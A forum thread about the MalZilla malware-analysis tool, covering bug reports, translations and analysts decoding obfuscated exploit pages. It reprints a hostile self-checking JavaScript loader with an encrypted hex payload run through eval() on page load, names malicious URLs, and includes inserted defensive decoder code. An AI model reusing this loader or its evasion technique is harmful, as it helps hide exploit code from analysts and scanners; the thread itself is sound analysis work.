Malware Domain List
Malware Related => Tools of the trade / Internet News => Topic started by: JohnC on August 19, 2007, 01:06:20 pm
-
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. MalZilla is a useful program for use in exploring malicious pages. It allows you to choose your own user agent and referrer, and has the ability to use proxies. It shows you the full source of webpages and all the HTTP headers. It gives you various decoders to try and deobfuscate JavaScript as well.
It was previously released only as a private beta, but has now moved to a public beta stage. You can download MalZilla at the MalZilla sourceforge page here (http://malzilla.sourceforge.net/).
There is a guide for using MalZilla made available here http://malzilla.sourceforge.net/tutorial_01/index.html
-
Malzilla updated to 0.9.2
Also a new tutorial in Documents section.
http://malzilla.sourceforge.net/
-
I apologize, 0.9.2 was a broken release :(
Fixed and uploaded as 0.9.2.1
The download mirrors will be updated (hopefully) in one hour.
-
Anyone willing to translate Malzilla to other languages?
I'm preparing next release, and I would like to include a couple of translations with the release.
There are some 200 strings to translate. Unicode is supported, so one can even translate to Chinese or Arabic.
Translation tool is also available.
I'm still polishing the interface, so the string list is still not complete, but if anyone applies for translating, I would prepare the list in ~10 days.
-
I'll try my best to get an exact translation for Greek,
whenever you think the strings' list is ready, pass it over... :)
-
I apologize for late reply.
I have uploaded a 0.9.3 pre-release on http://malzilla.sourceforge.net/
Please try to play a bit with translation, and tell me if buttons/labels are big enough for the translated text to fit in.
If not, I would need to play a bit with buttons size or with font size.
Translator folder contains a basic translating tool. It is still not polished, as it shows the resource numbers, but I've coded it today and didn't have time to make it better.
The uploaded default.lng is also done in hurry, it does not contain the messages and dialogs, but it is good enough to test the interface/GUI translation.
-
Thanks, Bobby!
Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.
TJS
-
Thanks, Bobby!
Do you prefer if we post bugs & suggestions here or on the sourceforge forum? I've already found a few in 0.9.3pre.
TJS
Hi TJS,
I check both forums every day, so both are equally good for posting bugs & suggestions.
regards
bobby
-
chinese_simply language ready! ;D
mailed to u, bobby~
-
Lol, jimmyleo... was it that easy doing it under Chinese? What's your secret? :)
Damn it... 'cause I've run into quite a bit of trouble doing this for Greek,
not only I couldn't find the equivalent technical terms,
but the resulting boxes should be huge afterwards... I'll see what can be done... :-\
-
hi sowhat-x,
I only couldn't find "find" resource ID in "decoder" tab...
and some of them should be wider for better presentation.
I translated most of them, and only a little hasn't been translated, because they are reserved in Chinese.
and some of technical names which I know maybe my FreShow experience :P
-
Hello Bobby,
Here are some issues and suggestions inspired by your latest pre-release of malzilla.
Update version number not in sync (reads 0.921 instead of 0.9.2.1)
Clipboard doesn't work properly (on Vista)
- functional but throws an error
- locks clipboard in other apps [this is annoying]
- Suggestion: clipboard feature disabled by default
Regression from previous version: URL no longer opens without http or www
- Suggestion: add support for hxxp, default to http for protocol and support non www.* links (ex. blah.com)
Suggestion: Option to enable/disable highlighting
Suggestion: Option to hide/show comments (<!-- -->) [some obfuscation puts them everywhere]
Hex view under download tab is a great idea -- what's the point of the 'hex view' tab?
Thank you very much for your hard work on this great utility!
tjs
-
@jimmyleo
This pre-release was just a test to see how the translating engine is working. There are more strings missing in that default.lng file.
I will release a complete list at the moment we know which features will get into 0.9.3 release.
@TJS,
About the minor issues:
====
- version number does not matter at the moment as long as you know if you have the newest version. You see, there is a HTML file on the Malzilla's site that contains a string with current version number. I can convert a string to float, and compare it with a number stored as variable in Malzilla. That's how it is done, and that's why the version is stored as 0.921 (float, floating point number).
If I would like to report it in the form of 0.9.2.1 I would need to write a parser and extra code for comparing these version numbers. I'll keep it simple for now.
====
- about URLs and annoying messages - I did try to prevent the user from entering FTP or HTTPS URLs, as Malzilla gets stuck for a long time if one is entered. Malzilla does not support these protocols, nor will it support them.
I'll code it in different way, as it is really annoying as it is.
===
- Enable/Disable Highlighters - will be done. If I get enough time I'll also make them configurable (select colors the way you like).
====
- Hex View under Download tab is just an experiment. I wanted to see how useful/useless it can be. Let the both Hex Views stay where they are, and we will see in the next release which one is for TrashCan.
About the major issues:
====
- Clipboard monitor is really a pain. It is useful if you copy a long list from some forum/site, but it is a pain as it also gets triggered at internal copy/paste in Malzilla.
Also, there is some bug (not in my code, maybe Delphi or Windows) that triggers the Clipboard Monitor twice for each URL on the clipboard. That's why it clears clipboard after URL is detected and pasted to the list.
Hmmm... I was thinking that I solved that locking of Clipboard for other applications (in fact - clearing the clipboard, not really locking).
I will get back to this Clipboard Monitor later, I have some more important things to do first.
Can you give me some info which error it triggers on Vista? I do not have Vista, all is done on XP (half-working Linux version is also there)
====
- Hide comments - this one will need some coding. See my list of priorities (follows in this post).
ToDo list:
====
Lately I see a lot of scripts using arguments.callee.toString() in a way which obviously gives very funny results in Malzilla.
(I guess all of you already know this, but...) arguments.callee.toString() differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in a way that makes the script "IE-only".
I already know what to try, I just need some time to test my idea.
====
History/Log/Case - no, those are not 3 options needed, it is just one feature. I received a request for keeping track of what was done and how, and to group things in something like a Project/Case.
Guess I'll do it in the form of a button "Start/stop logging", where every action will be recorded (URLs, HTML content, decoded content etc. etc.). I think this would be very useful feature.
====
More Download tabs (something like tabbed browsing in FireFox). Well, it sounds complicated to me to have unlimited number of tabs (a looooot of coding needed, and there is a danger of memory leaks), so I'm thinking about having some 5 (or say 10) Download tabs that the user can open.
btw. did anyone already see the debugger? :) (just type some nonsense in Decode tab, and try to run the script)
It wasn't intended to be there in this pre-release, but I forgot to disable it before doing the upload.
Unfortunately, you got a half-baked debugger, as some options were disabled.
This debugger is not my code, it is part of the wrapper I use to access SpiderMonkey, but it seems that nobody from the team who published the wrapper knows how to use/access this debugger from the program code (I asked on the mailing list), so I'm on my own here.
-
I just did some testing on XP and noticed that the clipboard issue occurs here too. When I click 'send script to decoder' in the text tab, I occasionally get an error from malzilla saying it cannot open the clipboard. On vista, I get this error when I start the application sometimes as well.
As for the debugger, I like it, but I think it should be integrated as another tab instead of a popup... Especially because it's not always useful (particularly when you have multiple nested obfuscated scripts). In many cases it throws errors about 2nd degree script variables not being defined, even though the obfuscation is properly decoded in the decode tab. I'd rather not have to close the debugger every time I run a script.
Maybe you can make the debugger configurable (whether to use it or not)...
Also, a random point, I HIGHLY recommend that you set 'clear cache on exit' as default. The cache is usually full of malware and AV scanners hate it.
TJS
-
@tjs
I just changed the code for Send script to decoder. It does not use Clipboard anymore.
About errors with Clipboard, I didn't have any of them here, so I have no idea what's wrong. Maybe it is a conflict with some software you use on both XP and Vista.
As for debugger - it is external code, programmed in such a way that it can't be so easily transformed into another tab.
Only thing I can do is a checkbox 'debug', where you can choose to use debugger or not, or a separate button for debugging.
As for Clear cache on exit - I can do it if you prefer so. I prefer not to clear the Cache, and I do not run any AV on this PC (with some 50GB of malware on my HDD, AV would go crazy).
-
Debugger:
I like the idea of a separate button or control to decide whether or not to use the debugger.
Cache:
I understand your point. I also don't run any AV scanners on the machines that I do analysis on. I just don't see the value of persisting the cache between sessions. It's not like the performance tradeoff is that valuable anyway (I don't mind if you have to redownload pages every time - after all, we're looking for malware, not browsing the web).
Clipboard:
I'll investigate further, but I'm not really running anything unusual on either of my analysis machines. Maybe I'm infected with something that is hooking the clipboard ;)
TJS
-
No problem. When the full-string is ready, just mention me.
and about the Clipboard Monitor problem. I've come across it sometimes under Vista. Just clicking "send to decoder" pops up "can't open clipboard".
debugger is a bonus originally. ::) I found it in one analysis condition.
I also recommend that clipboard feature disabled by default. because when I use other tools it made me confused.
best regards,
jimmyleo
-
I'm running into a new issue with 0.9.2.1pre
I constantly paste URLs without www or http by mistake (usually IP based) causing Malzilla to throw the malformed URL msgbox, but today while trying the following IP, I got a new error:
(X) Access violation at address 004eba13 in module malzilla.exe. Read of address 00000000
Can anyone else repro this bug?
208.72.168.176/e-Z1odey0312/index.php
Thanks,
TJS
-
Was there anything at that address at the time you tried it, or was it a 404 error page?
If there was some content, can you please upload it for me to test it?
I did have some Read of address 00000000 errors while trying to integrate the debugger.
All the errors were related to the package I use for dealing with Unicode strings:
http://mh-nexus.de/tntunicodecontrols.htm
so, not really my fault, but I can at least do something to prevent the Malzilla's crash if I can localize the error you got.
-
...only 1 request here...what jimmyleo already said about clipboard monitor being disabled by default:
copy/pasting http addresses in the 'URL' box has caused me quite a bit of trouble on occasion,
I think it happens sometimes when an address is already filled there,
and someone tries to copy/paste a partial address there (without the http prefix),
not sure, I'll have to dig a bit more to check exactly when this happens (under v0.921) :(
And the clipboard monitor feature in 0.93 beta makes it quite a bit more confusing... :P
-
http://rapidshare.com/files/92273310/malzilla.zip.html
Please test the changes I made.
I will drop Clipboard Monitor in the future. I'll try replace its functionality in some other way.
-
Ha-ha -> less than 16 minutes...this must be the fastest bugfix response I've ever seen! ;D
Yeap, at least at a first quick glance, copy/pasting URLs in this build
seems to be working in a much better and simpler way... ::) :)
-
Grrrr....
Take a look at the script in the attachment (pass= infected).
It is a modified Caesar cipher, that means trivial, but...
The decryption key is created on the fly, and it depends on the function length (arguments.callee thing).
The function is full with redundant operations and variables (used nowhere), just to make the analyst mad.
That is the kind of script I mentioned a couple of posts ago:
ToDo list:
====
Lately I see a lot of scripts using arguments.callee.toString() in a way which obviously gives very funny results in Malzilla.
(I guess all of you already know this, but...) arguments.callee.toString() differs between SpiderMonkey (Mozilla, FireFox, Malzilla...) and Internet Explorer.
As I see, a lot of scripts I'm seeing lately are using this in a way that makes the script "IE-only".
I already know what to try, I just need some time to test my idea.
Can someone help in deciphering this?
I would like to include decoding for such scripts in Malzilla.
If anyone is interested, I would like to share my findings.
Last night I tried to write a PScript for brute-forcing it, but PScript misses a lot of functions I need for this.
If I get some time today, I'll try to code one brute-forcer for this (EXE, not script).
-
I'm working on analyzing the script right now (finally, something I might know how to do! :)), but I just wanted to point out if you just wanted to find out what it is that the function is running, you can take a glimpse at the very end:
eval(h8TbWsRTn);}
It's going to run whatever is in the h8TbWsRTn variable (this is after it's been decrypted). Instead, we can modify the code to just print it out to the screen:
document.write(h8TbWsRTn);}
But, this doesn't come out clean:
So right now I'm looking at the code to see how it is actually working. It'll take a tiny bit longer than normal, since I have to look up certain syntaxes for things that the writer used that are ridiculous ("variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);") and I still don't fully understand how the deprecated .callee function works.
Anyway, first I'm just cleaning up the code. I'm posting each step in case I make a mistake, someone else can catch it and carry on their own work from there or something.
Step 1: Get syntax back and make it look "clean" (indentation, spaces, etc)
<html>
<script language="JavaScript">
<!--
function nlR1sYAdQ (dp58428V3) {
    var m6K3yhq2K=arguments.callee.toString().replace(/\W/g,'').toUpperCase();
    var A7ck1Wh8H;
    var B2t331TL0;
    var NisOkeH61 = m6K3yhq2K.length;
    var Xn47RT3Sm;
    var h8TbWsRTn='';
    var PkKX3bWF0 = new Array();
    for (B2t331TL0 = 0; B2t331TL0 < 256; B2t331TL0++) {
        PkKX3bWF0[B2t331TL0]=0;
    }
    var A7ck1Wh8H = 1;
    for (B2t331TL0 = 128; B2t331TL0; B2t331TL0 >>= 1) {
        A7ck1Wh8H = (A7ck1Wh8H>>>1)^((A7ck1Wh8H&1)?3988292384:0);
        for (i5G3CC1F6=0; i5G3CC1F6 < 256; i5G3CC1F6 += (B2t331TL0 * 2)) {
            PkKX3bWF0[i5G3CC1F6 + B2t331TL0] = (PkKX3bWF0[i5G3CC1F6]^A7ck1Wh8H);
            if (PkKX3bWF0[i5G3CC1F6+B2t331TL0] < 0) {
                PkKX3bWF0[i5G3CC1F6 + B2t331TL0] += 4294967296;
            }
        }
    }
    Xn47RT3Sm = 4294967295;
    for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
        Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
    }
    var eXK5vvK0K = new Array();
    var Y37iVA85C = 2323;
    Xn47RT3Sm = Xn47RT3Sm^4294967295;
    if (Xn47RT3Sm < 0) {
        Xn47RT3Sm += 4294967296;
    }
    Xn47RT3Sm = Xn47RT3Sm.toString(16).toUpperCase();
    var sNImKPP0N = new Array();
    var NisOkeH61 = Xn47RT3Sm.length;
    for (B2t331TL0=0; B2t331TL0 < 8; B2t331TL0++) {
        var LS0E1DrB3 = NisOkeH61+B2t331TL0;
        eXK5vvK0K[B2t331TL0] = 1;
        eXK5vvK0K[B2t331TL0] = Y37iVA85C;
        if (LS0E1DrB3 >= 8) {
            LS0E1DrB3 = LS0E1DrB3 - 8;
            sNImKPP0N[B2t331TL0] = Xn47RT3Sm.charCodeAt(LS0E1DrB3);
        } else {
            sNImKPP0N[B2t331TL0] = 48;
        }
    }
    var vM4s1CVcM = 0;
    var ahE3xpv6w;
    var L3KsBg108;
    var v65y6Hs6a;
    NisOkeH61 = dp58428V3.length;
    v65y6Hs6a = NisOkeH61;
    Y37iVA85C = 1123;
    Y37iVA85C = v65y6Hs6a;
    for (B2t331TL0 = 0; B2t331TL0 < NisOkeH61; B2t331TL0 += 2){
        var QgQRdYhu8 = dp58428V3.substr(B2t331TL0, 2);
        ahE3xpv6w = parseInt(QgQRdYhu8,16);
        L3KsBg108 = ahE3xpv6w - sNImKPP0N[vM4s1CVcM];
        if (L3KsBg108 < 0) {
            L3KsBg108 = L3KsBg108 + 256;
        }
        h8TbWsRTn += String.fromCharCode(L3KsBg108);
        v65y6Hs6a++;
        Y37iVA85C = 3891;
        if (vM4s1CVcM < sNImKPP0N.length - 1) {
            vM4s1CVcM++;
            Y37iVA85C = 1092;
            eXK5vvK0K[B2t331TL0] = 20;
        } else {
            vM4s1CVcM=0;
            Y37iVA85C=B2t331TL0;
        }
    }
    eval(h8TbWsRTn);
}
//-->
</script>
<body onLoad="nlR1sYAdQ('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')">
</body>
</html>
Step 2: Replace variable names with normal ones, and remove obvious redundancy
<html>
<script language="JavaScript">
<!--
function thefunction (parameter) {
    var variable1 = arguments.callee.toString().replace(/\W/g,'').toUpperCase();
    var i; // Used in for loops
    var variable4 = variable1.length; // .lengths of various vars
    var variable6 = '';
    var array1 = new Array();
    for (i = 0; i < 256; i++) {
        array1[i] = 0;
    }
    var variable2 = 1;
    for (i = 128; i; i >>= 1) {
        variable2 = (variable2>>>1)^((variable2 & 1) ? 3988292384 : 0);
        for (j = 0; j < 256; j += (i * 2)) {
            array1[j + i] = (array1[j]^variable2);
            if (array1[j+i] < 0) {
                array1[j + i] += 4294967296;
            }
        }
    }
    var variable5 = 4294967295;
    for(variable2 = 0; variable2 < variable4; variable2++) {
        variable5 = array1[(variable5^variable1.charCodeAt(variable2))&255]^((variable5>>8)&16777215);
    }
    var array2 = new Array();
    variable5 = variable5^4294967295;
    if (variable5 < 0) {
        variable5 += 4294967296;
    }
    variable5 = variable5.toString(16).toUpperCase();
    var array3 = new Array();
    var variable4 = variable5.length;
    for (i = 0; i < 8; i++) {
        var variable7 = variable4 + i;
        array2[i] = 1;
        array2[i] = '';
        if (variable7 >= 8) {
            variable7 = variable7 - 8;
            array3[i] = variable5.charCodeAt(variable7);
        } else {
            array3[i] = 48;
        }
    }
    var variable8 = 0;
    var variable10;
    variable4 = parameter.length;
    var variable13 = 3891;
    var variable11 = variable4;
    for (i = 0; i < variable4; i += 2){
        var variable12 = parameter.substr(i, 2);
        variable10 = parseInt(variable12, 16);
        if (variable10 < 0) {
            variable10 = variable10 + 256;
        }
        variable6 += String.fromCharCode(variable10);
        variable11++;
        if (variable8 < array3.length - 1) {
            variable8++;
            variable13 = 1092;
            array2[i] = 20;
        } else {
            variable8 = 0;
            variable13 = i;
        }
    }
    eval(variable6);
}
//-->
</script>
<body onLoad="thefunction('AAae9e93b79EA8A3648596a5949f719DB7ab58978BA19183977C7A746Cb0af96B6599176a7689c6a7b7e936Da4a7a0aab19E9EA4b6639C96b0A5959571a9A888B8AB999Eaa5d6263b69EA09cA4989e5d7395875faa61605c6d67A49F98A5a99Ab67C91a3A85D6270ba9aa250B4667098758980789470AF96b6597467ae676d82B990766Bb996ab55ab9d67a3796ab26Ab3769176a7689C6a7B7E935EAF9AA79cB8A16BA6A4a75996a96f8868B897B1827fAF91A263a28F8696a39E74B7a9765C6B74a691b555B1677BAC9872787DA072B29ea75084a7AB96bd61596bA9a4AB5d88709B627782ae8C8A76606b876ca4677886A58789716b6A7A747467AE676d82B990765B6e5eb1677BAC9872787da09088709B627782ae8C8a966D607EAB9AA764AA6167a66689858c8a6d617E9ba8a76C7D679B756986AA9B7F6D61756d74797Ba4626490aa907b7F7d679b756986aa9B7F6E6e80666255BFAA6167A66689858c8A6d58b4667098758980789473777375628e586Ba66A6cA76A80808B865f666D7863697B6D6b6e766C68647d656270aaA8A258AC8180a1798a7f959a726970AD85779c7886889a9B7562657970A2818Ba56581929A9060817d679b756986aa9B7F5a626C55b4AD7670A398856a819C9fa27c77AF6a8A84A9905b747aa06b6991ae8776a07261AD7670A398856a819C9fA27C77AF6a8A84a9908d8Eb466709875898078945e749eaa5958A8756CAC9D866e78979E9e857Cb06e817fA88C64797bA4626490aa907BA1596C50735e59B0bc6B67A3AB776E7DAB94997c8Aa16E86939E875B876Ca4677886a58789926472786B69647c6b70677d6F6BADC0b29a9A7a9168A5a5ad8672786b69647C6b70677d6E6B96B2a761A6757093619385818681696bA1746c9c66948978817f9C9d6cb76F65a978A474A675709361938581866f6459ABA49A6F8d7CAE92A89072b1677bac9872787DA0906C9a95669b6dAE97bc868e9189996C98797075937198A196b67C9f94a876AD5DB56A67937485897D95625956756a6E92a2615891a86B916db99ba87d8173715E6A6a66677a6c6B6679626bADB996AB55AAad8562A6AC6d7F94769E95ba557AA7b69aA9586c70af96B6598680b6896D7C7b8c9C6d75686B687F9A95669B6dAE97BC866D91a86B916DB99ba87da1696B6e78726667756e6e70AD9F5058A49a6f8d7CAE92A89071695e64B49195798D71aaa6b17d5B80696b6E78726667756e6F70C19A95669b6dae97BC866d91A86B916DB99bA87D71A9a888B8ab999Eaa5d6a6B6D67A49F98A5a99aB67c91A3a85d6270ba9AA250A9A9717685aa637FAB72A79aBB5971a2b596B25D6D74a691B555a0997bAC6665BC6aA872a59e66887bAA9bAD91679
C95b19cAD9D7F9F9fa26b7970A0766d7dA59a7b76657f7d679b756986aa9b7F6c687E7970A0766D7DA59a7B64606D59aba6a4a7597Da76A606288AD6B6d81A09467b66b6eAE79a85b747Aa06B6991AE87767E9Bad8A769Ca7648d8594797BA4626490aa907ba176616BA9a98e67a7b0647A93907D6Caf6B647dB88C7F92818F80A39769806c97a56B99A955617Da76a606288AD6B6d8276685963b0819875696275bb6771728c9c6160757Ab1677C66686Ba9a9717685AA637fAB907D6caf6B647dB88C7f92819A95669b6dae97BC865E93ab96AB78b39D9571b75d819875696275bb67715E7fB65095AFa89e55BF9FA4688476AA6893a18B747Aa06b6991AE8776a0726d6D7Fb6ada6a4a7598497A57F78776aA76D81696BA6A4a759798686739573896B6a7FAF91A2637dA686869a9294b46B74abA5ab5081bb7d8698BCA163627e9C9d6cb76f65A978a4769c8cA5887e9678837972A5959EAAA9A17095B1787Da6adA168767697947AA86F6Abd6e9f6b9985AC8978806783AF726a66766c6b8693A88D698b70839C8086b17d919ca8987667749BB3AB58747aA06b6991ae8776806574797BA4626490AA907B80a09467b66B6Eae79a86b747Aa06b6991ae87766E726B5ebfaf91a263ac92688c9d9687BA9c769C8cA5887E9678837972ACa592B6A9ab5D88709B627782ae8C8a6562597E797B82879E6084756A76a5a5ABa3958cA3AD5DBB926378A79b90ACAB6561666c7081a2957B9192a7a66f72887b7d73A8658d67796696a47b767aA67788988B9288A5848C6d659e7B92749Eaa61789d94779A97A8aa666C735E59B08cA68172A4979dA67a76789D94779a97a8AA665B756A6f70C1a68681959fa779b8ad5B6D96A9ab9eB2A05E96B5A4a678ac9aa273b2999e5D8Ca68172a4979da67a626b81BB7d8698bcA163626e60748b94ac84648A6c8ca1816C68697470A29B6C88839C927D6d6Ab2716c96B76d7a76B56c7F9871A19Ea3ABad985d745e59B0938c9c7f8B696eA37c645B6B9985AC8978806783af726A657D6b6B96b78a6b98bb6d7A809e7970a0766D7dA59a7B967276696Bad639aA5a8a959AB7f96A1887d786e9E688065748b94ac84648A6c8CA1817d679b756986aa9b7f6badc09Aaf96B0619D869487A3a388adA4597eb24381aaAE819a7b9Daca76c60639677786D96A571699184696e69867267967C657b6C7b7166767c9A726a7A6c667679679a6a856a6993a46c9a6685719160a56B6F7B7d6e71727C6c726a867069677B6c9a997D7071667c6c7A67a670659179699B697d6E71727C977A69A670656479777098779F6463769B6C7A789c91687B9B719B85716776796d7a65856d6660856a7A6BA56F6771a46b9a6d866e6972A4699B6bA56f699578766e6ba59F6
963A5659a6da57069717C6e726E7a6e659579676f687b7c6991a46D726a7d6F696585699A96A56B717478696e797B9E639677786d96857168667b657a767c726668A49a7a677A6971737C6C9a6D7c6d7166856b9b687D7b6972a46c9A6dA571657179699b69856D697378696F657A6C65647B669b6a7A7f6672796a6f6e7b7066637a6C70687a72676179776E76866e66967A6B70677A716691796C6f767B7A66697a6c706a79719161799B6F6a7B6f66917a6B706C7a7b666979776F787b6E6568A565709a7A6E6675796A6f797B7066667A6A70697A7065767c6D9A65a56d6969A4667a76796d666279796d66789D637677786D767D6F91687c6a9a6e86696967A5657b6a7a696972a466726da69c666084689B66856b6995A465726D7C6f6971A4977a797D6F6661a46D71667D6a71687B6d706c7D7e699178776F7B796963936A5E74')">
</body>
</html>
And now is where the drudgework of tracing each variable as it's thrown around comes in... I think I'll save it for the morning or tomorrow.
A few things I would like to point about prerequisites for the string passed to the javascript function:
- It needs to be a longer string. "hellohellohellohello" works, when "hello" returns nothing. ("hellohe" was the shortest I could get it)
- As far as I could tell, it can have newlines being passed to it.
- The line "variable10 = variable10 + 256;" is bringing characters being made up above 256, no matter what. AKA it's up to unicode
http://unicode.org/charts/
-
hello bobby
I've come across this issue many times recently.
My friend dikex and I found a way to decode it in the script way we used to do.
Because it calls itself, we throw it into a variable without changing it, e.g. var a="....";
and replace "arguments.callee" with the variable.
Then we can do what we want to do, e.g. replace eval() to ... method.
have fun!
best regards,
jimmyleo
-
Hi Drusepth, hi jimmyleo,
You can't make any single change in the script because it does not check only the length of the function, but it checks every single character:
for(A7ck1Wh8H = 0; A7ck1Wh8H < NisOkeH61; A7ck1Wh8H++) {
Xn47RT3Sm = PkKX3bWF0[(Xn47RT3Sm^m6K3yhq2K.charCodeAt(A7ck1Wh8H))&255]^((Xn47RT3Sm>>8)&16777215);
}
So, if Xn47RT3Sm does not have the expected value at the end of the loop, it means something is changed in the script, and the decoding will not succeed. Only with the proper value of this variable will the data decode like it should.
So, I have asked on another board for advice, and I was told to use the oldest trick in decoding - override the eval() function.
JavaScript allows re-defining every internal function, so just add this line at the beginning of the script:
function eval(a) {document.write(a)};
This is a re-definition of the eval() function, so eval will in fact call document.write.
This is the only working method for this kind of scripts.
If you use this on another script, just be sure that the script does not do another overriding of eval() (or of any other internal function), after your overriding.
best regards
bobby
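
The per-character check and the "keep the original in a variable" idea discussed above, as an added example that is not part of the original thread: a static decoder that derives the key from the untouched function text and decodes without calling eval(). The stub text, the payload and all function names are constructed for illustration.

```javascript
// Added example: static decoder for the self-keyed scheme in the posted script.
// Standard CRC-32 (reflected polynomial 0xEDB88320 = 3988292384, the constant
// in the posted script), taken over the low byte of each character.
function crc32(text) {
  const table = new Uint32Array(256);
  for (let n = 0; n < 256; n++) {
    let c = n;
    for (let k = 0; k < 8; k++) c = (c & 1) ? (c >>> 1) ^ 0xEDB88320 : c >>> 1;
    table[n] = c >>> 0;
  }
  let crc = 0xFFFFFFFF;
  for (let i = 0; i < text.length; i++) {
    crc = table[(crc ^ text.charCodeAt(i)) & 0xFF] ^ (crc >>> 8);
  }
  return (crc ^ 0xFFFFFFFF) >>> 0;
}

// Key = character codes of the CRC written as 8 upper-case hex digits,
// left-padded with '0' (code 48), computed over the function text with all
// non-word characters removed and upper-cased, as the posted script does.
function deriveKey(functionSource) {
  const normalized = functionSource.replace(/\W/g, '').toUpperCase();
  const hex = crc32(normalized).toString(16).toUpperCase().padStart(8, '0');
  return Array.from(hex, (ch) => ch.charCodeAt(0));
}

// Each pair of hex digits is one byte; subtract the key byte modulo 256,
// cycling through the 8 key bytes. Returns the text, never executes it.
function decodePayload(hexPayload, key) {
  let out = '';
  for (let i = 0; i < hexPayload.length; i += 2) {
    const byte = parseInt(hexPayload.slice(i, i + 2), 16);
    out += String.fromCharCode((byte - key[(i / 2) % key.length] + 256) % 256);
  }
  return out;
}

// Builds the constructed sample input for the demo below (inverse of decode).
function encodeSample(plaintext, key) {
  return Array.from(plaintext, (ch, i) =>
    ((ch.charCodeAt(0) + key[i % key.length]) % 256).toString(16).padStart(2, '0')
  ).join('');
}

// Constructed stand-ins: the function text as downloaded, and the same text
// after the analyst's usual edit of swapping eval() for document.write().
const ORIGINAL_STUB =
  'function stub(p) { var s = arguments.callee.toString(); /* key + decode */ eval(out); }';
const EDITED_STUB = ORIGINAL_STUB.replace('eval(out)', 'document.write(out)');
const PLAINTEXT = 'document.title = "constructed sample";';

function demo() {
  const payload = encodeSample(PLAINTEXT, deriveKey(ORIGINAL_STUB));
  return {
    // Key taken from the untouched text: the payload decodes.
    fromOriginal: decodePayload(payload, deriveKey(ORIGINAL_STUB)),
    // Key taken from the edited text: the checksum changes, output is garbage.
    fromEdited: decodePayload(payload, deriveKey(EDITED_STUB)),
  };
}

console.log(demo());
```

For a real sample, pass the function text as the targeted engine's toString() would report it, since the thread notes that SpiderMonkey and Internet Explorer differ here.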
-
because it does not check only the length of the function, but it checks every single character:
oh, bobby:
You may not have looked at my reply carefully. :P
so we throw it into a variable without changing
-
@jimmyleo
Sorry, but I do not understand, even if I read your post a couple of times.
Can you give an example where you can show what are you exactly doing with arguments.callee?
-
It may help you.
You can do it one step at a time until the result is revealed.
regards,
jimmyleo
-
I have a bug and feature suggestion related to the 'send to decoder' feature:
* send script to decoder breaks when a script src is closed.. ex:
<script src="poked.js" language="JavaScript"></script>
malzilla thinks the script starts after </script> till EOF
* send script to decoder can be improved on pages with multiple <script>
<script>foo;</script><script>bar;</script>
it would be nice to have a feature to send ALL scripts to decoder
Example malware site exploiting both of these limitations:
hxxp://pokerfinds.com
Thanks,
TJS
-
@TJS
Many thanks for locating this bug.
I did see it a couple of times, but I didn't locate what's producing the bug.
About the sending all the scripts (or should I better say - all the relevant data) - it is not so trivial.
There are a lot of scripts which are using multiple begin and end tags (like in your example), but I also saw a lot of scripts where a part of malicious code is in HTML part:
<html>
<script>function decode_and_run(a){....}</script>
<body
onLoad="decode_and_run('AF123400AA (encrypted data/code) ...')"></body></html>
See, I would need to build some heuristics that can decide if some of the normal HTML events are also relevant, and I do not know how to do that (in fact, I have an idea, but I do not think that I'll ever have enough time to code it, just like I do not have time for my other ideas like using Malzilla as a scanner that would have signatures of various exploits, or adding more standard DOM objects and functions etc.)
If it would be OK just to have some kind of "Append to Decoder" button (as addition to Send to Decoder), that will be done in 5 minutes.
@jimmyleo
Unfortunately, I didn't succeed in getting any results from the files you uploaded.
Do you use IE to run these or are you using any SpiderMonkey-based app (FireFox, Malzilla...)?
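
One way to gather everything for a "Send All" to the decoder, covering the three cases in this exchange (a closed script src tag, several script blocks, and code in an onLoad attribute). This is an added example, not Malzilla's code; the function names and the sample page are constructed.

```javascript
// Added example, not Malzilla's code. Regex-based, so it is a triage helper
// and not an HTML parser: attribute values containing '>' are not handled.
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
const SRC_RE = /\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
const HANDLER_RE = /\s(on[a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;

function collectScriptMaterial(html) {
  const found = { inline: [], external: [], handlers: [] };
  for (const m of html.matchAll(SCRIPT_RE)) {
    // A <script src=...></script> pair has an empty body: record the URL so
    // it can be fetched separately, and do not treat what follows as script.
    const src = SRC_RE.exec(m[1]);
    if (src) found.external.push(src[1] ?? src[2] ?? src[3]);
    if (m[2].trim() !== '') found.inline.push(m[2].trim());
  }
  // Look for event-handler attributes only in the markup that is left once
  // the script blocks are removed, so strings inside scripts are not matched.
  const markup = html.replace(SCRIPT_RE, '');
  for (const m of markup.matchAll(HANDLER_RE)) {
    found.handlers.push({ event: m[1].toLowerCase(), code: m[2] ?? m[3] });
  }
  return found;
}

// Decoder input: all inline scripts in page order, then the handler code,
// so function definitions come before the calls that use them.
function buildDecoderInput(found) {
  return [...found.inline, ...found.handlers.map((h) => h.code)].join('\n');
}

// Constructed sample page combining the cases quoted in the thread.
const SAMPLE_PAGE = [
  '<html>',
  '<script src="poked.js" language="JavaScript"></script>',
  '<script>function decode_and_run(a){ /* constructed stub */ }</script>',
  '<script>foo;</script><script>bar;</script>',
  '<body',
  'onLoad="decode_and_run(\'AF123400AA\')"></body></html>',
].join('\n');

const sampleResult = collectScriptMaterial(SAMPLE_PAGE);
console.log(sampleResult);
console.log(buildDecoderInput(sampleResult));
```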
-
Finding script start and end points fixed for the given case.
What to do with multiple script tags, Append or Send All?
-
Append could get messy if you start doing cross-domain stuff (I don't want to manually have to clear decoder every time I work on a different site), so maybe a new button to send all to decoder is a good idea. But append is also a good idea because I'm sure there will be cases where your users don't want to send *all* scripts on a page to the decoder....
???
Has anyone else run into this issue? Does anyone have an opinion here?
-
You won't need to clear decoder anymore in the recent future.
Development version on my PC has tabbed interface (multiple tabs for Download and Decoder)
I will upload it as soon as we get (re)solved the emerging bugs/suggestions.
-
Re bobby:
I'm truly sorry for not explaining.
I used IE to execute this script.
and you can see a following Caesar decoding.
and you can do the same issue to it.
regards,
jimi.
-
